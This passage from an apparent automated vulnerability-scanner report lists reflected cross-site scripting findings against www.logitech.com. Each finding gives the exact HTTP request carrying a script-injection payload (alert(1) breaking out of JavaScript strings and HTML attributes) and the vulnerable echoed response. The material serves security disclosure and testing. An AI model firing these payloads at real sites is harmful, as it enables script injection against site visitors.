User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:57:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','[{lclid}]203c0</script><script>alert(1)</script>762ee0b3a24/69/7112' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DC
...[SNIP]...

1.16. http://www.logitech.com/[{lclid}]/69/7112 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.logitech.com
Path:   /[{lclid}]/69/7112

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5eeb3"%3bfac010147b1 was submitted in the REST URL parameter 1. This input was echoed as 5eeb3";fac010147b1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /[{lclid}]5eeb3"%3bfac010147b1/69/7112 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:57:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script language="javascript">
       
        try {        
            var thisUrl = "www.logitech.com/[{lclid}]5eeb3";fac010147b1/69/7112";
            document.domain = "logitech.com";
           }
           catch (e) {}
   
</script>
...[SNIP]...

1.17. http://www.logitech.com/[{lclid}]/69/7112 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /[{lclid}]/69/7112

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3263</script><script>alert(1)</script>00909e79a22 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /[{lclid}]/69f3263</script><script>alert(1)</script>00909e79a22/7112 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:57:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','[{lclid}]/69f3263</script><script>alert(1)</script>00909e79a22/7112' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.d
...[SNIP]...

1.18. http://www.logitech.com/[{lclid}]/69/7112 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /[{lclid}]/69/7112

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 271cc"><script>alert(1)</script>d3712e37ad4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /[{lclid}]/69271cc"><script>alert(1)</script>d3712e37ad4/7112 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:57:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="[{lclid}]/69271cc"><script>alert(1)</script>d3712e37ad4/7112">
...[SNIP]...

1.19. http://www.logitech.com/[{lclid}]/69/7112 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /[{lclid}]/69/7112

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fcdaa</script><script>alert(1)</script>d0929049bc5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /[{lclid}]/69/7112fcdaa</script><script>alert(1)</script>d0929049bc5 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:57:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','[{lclid}]/69/7112fcdaa</script><script>alert(1)</script>d0929049bc5' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.20. http://www.logitech.com/[{lclid}]/69/7112 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /[{lclid}]/69/7112

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e270c"><script>alert(1)</script>41a4e081ad8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /[{lclid}]/69/7112e270c"><script>alert(1)</script>41a4e081ad8 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:57:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="[{lclid}]/69/7112e270c"><script>alert(1)</script>41a4e081ad8">
...[SNIP]...

1.21. http://www.logitech.com/alert/digital-video-security-system [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /alert/digital-video-security-system

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 729ff</script><script>alert(1)</script>c269ff263a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /alert729ff</script><script>alert(1)</script>c269ff263a0/digital-video-security-system HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','alert729ff</script><script>alert(1)</script>c269ff263a0/digital-video-security-system' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','
...[SNIP]...

1.22. http://www.logitech.com/alert/digital-video-security-system [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /alert/digital-video-security-system

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be86f"><script>alert(1)</script>647b6231d58 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alertbe86f"><script>alert(1)</script>647b6231d58/digital-video-security-system HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="alertbe86f"><script>alert(1)</script>647b6231d58/digital-video-security-system">
...[SNIP]...

1.23. http://www.logitech.com/alert/digital-video-security-system [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /alert/digital-video-security-system

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 885b2</script><script>alert(1)</script>ad4575a1fa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /alert/digital-video-security-system885b2</script><script>alert(1)</script>ad4575a1fa HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:43:05 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','alert/digital-video-security-system885b2</script><script>alert(1)</script>ad4575a1fa' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.24. http://www.logitech.com/alert/digital-video-security-system [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /alert/digital-video-security-system

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6640a"><script>alert(1)</script>0f4edc06f36 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alert/digital-video-security-system6640a"><script>alert(1)</script>0f4edc06f36 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="alert/digital-video-security-system6640a"><script>alert(1)</script>0f4edc06f36">
...[SNIP]...

1.25. http://www.logitech.com/assets/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 891c0"><script>alert(1)</script>8c81f17c142 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /891c0"><script>alert(1)</script>8c81f17c142/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="891c0"><script>alert(1)</script>8c81f17c142">
...[SNIP]...

1.26. http://www.logitech.com/assets/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d51be</script><script>alert(1)</script>22df83572d0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /d51be</script><script>alert(1)</script>22df83572d0/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','d51be</script><script>alert(1)</script>22df83572d0' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.27. http://www.logitech.com/assets/14279/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/14279/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae398</script><script>alert(1)</script>9af0d89f918 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ae398</script><script>alert(1)</script>9af0d89f918/14279/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','ae398</script><script>alert(1)</script>9af0d89f918/14279' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.28. http://www.logitech.com/assets/14279/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/14279/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e850a"><script>alert(1)</script>a573fb14849 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /e850a"><script>alert(1)</script>a573fb14849/14279/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="e850a"><script>alert(1)</script>a573fb14849/14279">
...[SNIP]...

1.29. http://www.logitech.com/assets/14280/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/14280/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acd65</script><script>alert(1)</script>fca6d6196d5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /acd65</script><script>alert(1)</script>fca6d6196d5/14280/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','acd65</script><script>alert(1)</script>fca6d6196d5/14280' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.30. http://www.logitech.com/assets/14280/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/14280/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c460"><script>alert(1)</script>509a3c190d0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /2c460"><script>alert(1)</script>509a3c190d0/14280/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="2c460"><script>alert(1)</script>509a3c190d0/14280">
...[SNIP]...

1.31. http://www.logitech.com/assets/14976/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/14976/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67bee"><script>alert(1)</script>34ed157076e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /67bee"><script>alert(1)</script>34ed157076e/14976/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="67bee"><script>alert(1)</script>34ed157076e/14976">
...[SNIP]...

1.32. http://www.logitech.com/assets/14976/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/14976/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d08b</script><script>alert(1)</script>a2c981bdd40 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /3d08b</script><script>alert(1)</script>a2c981bdd40/14976/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','3d08b</script><script>alert(1)</script>a2c981bdd40/14976' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.33. http://www.logitech.com/assets/2062/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/2062/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de98c"><script>alert(1)</script>72a8646bc33 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /de98c"><script>alert(1)</script>72a8646bc33/2062/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
